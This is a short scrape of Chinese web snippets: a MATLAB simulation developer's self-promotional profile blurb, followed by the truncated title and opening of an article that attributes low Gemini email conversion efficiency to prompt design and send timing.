✅作者简介:热爱科研的Matlab仿真开发者,擅长数据处理、建模仿真、程序设计、完整代码获取、论文复现及科研仿真。🍎 往期回顾关注个人主页:Matlab科研工作室🍊个人信条:格物致知,完整Matlab代码及仿真咨询…
为什么你的Gemini邮件CTE低于行业均值2.8倍?:从Prompt架构到发送时序的深度归因
更多请点击: https://intelliparadigm.com 第一章:为什么你的Gemini邮件CTE低于行业均值2.8倍?:从Prompt架构到发送时序的深度归因 Gemini邮件的客户转化效率(CTE)显著偏低,根本原因常被误判为…